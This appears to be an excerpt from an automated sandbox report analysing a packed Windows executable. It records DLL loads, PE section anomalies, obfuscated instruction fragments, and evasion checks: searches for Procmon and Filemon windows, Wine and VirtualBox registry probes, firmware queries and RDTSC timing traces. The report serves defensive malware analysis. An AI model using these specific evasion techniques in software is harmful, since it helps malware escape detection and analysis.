Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe

Static file information: File size 1832448 > 1048576

Source: file.exe

Static PE information: Raw size of sbjgrbkb is bigger than: 0x100000 < 0x197600

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sbjgrbkb:EW;biqspjfj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sbjgrbkb:EW;biqspjfj:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1c06e1 should be: 0x1c72fd

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: sbjgrbkb
Source: file.exe	Static PE information: section name: biqspjfj
Source: file.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F19754 push 2264CF20h; mov dword ptr [esp], edi	0_2_00F19A34
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F19754 push ecx; mov dword ptr [esp], esi	0_2_00F19A38
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01110112 push eax; mov dword ptr [esp], 5F4FDA72h	0_2_01110137
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01110112 push ebx; mov dword ptr [esp], 47A36CDAh	0_2_011101C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1C0E7 push ebx; mov dword ptr [esp], 1EFF5E86h	0_2_00F1DF22
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1C0CB push 6FC91774h; mov dword ptr [esp], esi	0_2_00F1C0D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01000158 push edx; mov dword ptr [esp], 71DCF45Bh	0_2_01000241
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01000158 push 3318ECBAh; mov dword ptr [esp], ebx	0_2_01000257
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01000158 push ebx; mov dword ptr [esp], 329D99B1h	0_2_010002E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01000158 push 73BEE0A1h; mov dword ptr [esp], edx	0_2_01000313
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE40A1 push edx; mov dword ptr [esp], esp	0_2_00FE4441
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE40A1 push 34CE3975h; mov dword ptr [esp], esi	0_2_00FE4461
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE40A1 push esi; mov dword ptr [esp], edi	0_2_00FE449C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE40A1 push edi; mov dword ptr [esp], ecx	0_2_00FE452A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE40A1 push edi; mov dword ptr [esp], edx	0_2_00FE4541
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE40A1 push 234BAAB2h; mov dword ptr [esp], eax	0_2_00FE46B6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE40A1 push 7A3C0BE3h; mov dword ptr [esp], edx	0_2_00FE46BE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F18094 push esi; mov dword ptr [esp], ebp	0_2_00F1809A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102C1B9 push ecx; mov dword ptr [esp], ebx	0_2_0102C5D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102C1B9 push 210FF976h; mov dword ptr [esp], edi	0_2_0102C5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102C1B9 push edx; mov dword ptr [esp], ebp	0_2_0102C614
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102C1B9 push 2430C864h; mov dword ptr [esp], esi	0_2_0102C6AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102C1B9 push edx; mov dword ptr [esp], ebp	0_2_0102C6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102C1B9 push ebp; mov dword ptr [esp], ecx	0_2_0102C6D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102C1B9 push edi; mov dword ptr [esp], eax	0_2_0102C6F6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102C1B9 push ebp; mov dword ptr [esp], eax	0_2_0102C71E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102C1B9 push edi; mov dword ptr [esp], edx	0_2_0102C72B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102C1B9 push 575F87E0h; mov dword ptr [esp], ebx	0_2_0102C76A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102C1B9 push 4F817698h; mov dword ptr [esp], esi	0_2_0102C80D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102C1B9 push 7BD18729h; mov dword ptr [esp], edi	0_2_0102C815
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010801C9 push 4F0850CAh; mov dword ptr [esp], ebp	0_2_010801F8

Source: file.exe	Static PE information: section name: entropy: 7.983244716136416
Source: file.exe	Static PE information: section name: sbjgrbkb entropy: 7.954135504267137

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108EFE7 second address: 108EFFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B8681h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108EFFC second address: 108F01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF1610D0718h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108F01A second address: 108F020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108F020 second address: 108F024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108F024 second address: 108F044 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF1610B867Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FF1610B8678h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109342B second address: 109342F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109342F second address: 109345F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF1610B8676h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop ecx 0x0000000e popad 0x0000000f push ebx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FF1610B867Ah 0x0000001a push edx 0x0000001b pop edx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jnc 00007FF1610B8676h 0x00000025 ja 00007FF1610B8676h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10935AB second address: 10935B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10935B1 second address: 10935B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10935B5 second address: 10935CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D0711h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109370F second address: 109371E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF1610B8676h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109371E second address: 1093724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1093724 second address: 1093753 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF1610B8676h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FF1610B8690h 0x00000010 jmp 00007FF1610B867Ah 0x00000015 jmp 00007FF1610B8680h 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1093753 second address: 1093759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1093852 second address: 1093856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1093856 second address: 1093878 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FF1610D0716h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1093878 second address: 10938A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF1610B867Eh 0x0000000d jmp 00007FF1610B8683h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10938A1 second address: 10938BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF1610D0717h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1093A0A second address: 1093A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1093A0E second address: 1093A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FF1610D0716h 0x0000000c pop ecx 0x0000000d push edx 0x0000000e jc 00007FF1610D070Eh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1096266 second address: 109626B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109626B second address: 1096275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FF1610D0706h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1096342 second address: 1096346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1096346 second address: 1096360 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D0716h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1096360 second address: 1096366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1096366 second address: 109636A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1096458 second address: 109645D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1096512 second address: 109651B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109651B second address: 1096531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FF1610B867Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1096531 second address: 1096537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1096537 second address: 109653B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10965DE second address: 10965EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D070Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10965EF second address: 10965F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF1610B8676h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10965F9 second address: 10965FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10965FD second address: 109660F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FF1610B8676h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10966A0 second address: 10966A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10966A5 second address: 10966FF instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF1610B868Eh 0x00000008 jmp 00007FF1610B8688h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 pushad 0x00000011 mov ah, bh 0x00000013 mov ecx, dword ptr [ebp+122D19AAh] 0x00000019 popad 0x0000001a push 00000000h 0x0000001c sub di, 876Ah 0x00000021 call 00007FF1610B8679h 0x00000026 ja 00007FF1610B867Ch 0x0000002c pushad 0x0000002d push ecx 0x0000002e pop ecx 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 push eax 0x00000033 pushad 0x00000034 jmp 00007FF1610B867Bh 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10966FF second address: 1096703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1096703 second address: 109672B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B8681h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jng 00007FF1610B8684h 0x00000014 push eax 0x00000015 push edx 0x00000016 js 00007FF1610B8676h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109672B second address: 10967A7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push edi 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d pop edi 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007FF1610D0711h 0x00000017 pop eax 0x00000018 mov edx, dword ptr [ebp+122D2AEEh] 0x0000001e push 00000003h 0x00000020 mov dword ptr [ebp+122D26A3h], ecx 0x00000026 push 00000000h 0x00000028 or dword ptr [ebp+122D1BA7h], ecx 0x0000002e add edx, dword ptr [ebp+122D2BCAh] 0x00000034 push 00000003h 0x00000036 mov dx, 403Ah 0x0000003a call 00007FF1610D0709h 0x0000003f push edi 0x00000040 jmp 00007FF1610D0712h 0x00000045 pop edi 0x00000046 push eax 0x00000047 je 00007FF1610D070Eh 0x0000004d mov eax, dword ptr [esp+04h] 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10967A7 second address: 10967AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10967AB second address: 10967B5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF1610D0706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10967B5 second address: 10967E7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF1610B8686h 0x00000008 jmp 00007FF1610B8680h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jmp 00007FF1610B8682h 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10967E7 second address: 1096824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push ebx 0x0000000f jmp 00007FF1610D070Eh 0x00000014 pop ebx 0x00000015 pop eax 0x00000016 call 00007FF1610D070Bh 0x0000001b mov cl, 9Ch 0x0000001d pop edi 0x0000001e lea ebx, dword ptr [ebp+124511B1h] 0x00000024 adc dh, FFFFFFBAh 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d pop eax 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1081838 second address: 108184D instructions: 0x00000000 rdtsc 0x00000002 js 00007FF1610B8676h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007FF1610B8676h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108184D second address: 1081852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1081852 second address: 1081858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1081858 second address: 1081869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1610D070Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1081869 second address: 1081886 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF1610B867Dh 0x0000000f jno 00007FF1610B8676h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B622B second address: 10B6249 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF1610D0717h 0x00000008 jmp 00007FF1610D0711h 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B6249 second address: 10B6258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B6258 second address: 10B625E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B625E second address: 10B6262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B6262 second address: 10B6268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B639D second address: 10B63A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B63A3 second address: 10B63A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B63A7 second address: 10B63B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B63B0 second address: 10B63BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B63BD second address: 10B63C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B63C1 second address: 10B63E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1610D0716h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B63E1 second address: 10B63EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF1610B8676h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B656A second address: 10B656E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B656E second address: 10B6574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B6574 second address: 10B6593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FF1610D0712h 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B6593 second address: 10B659B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
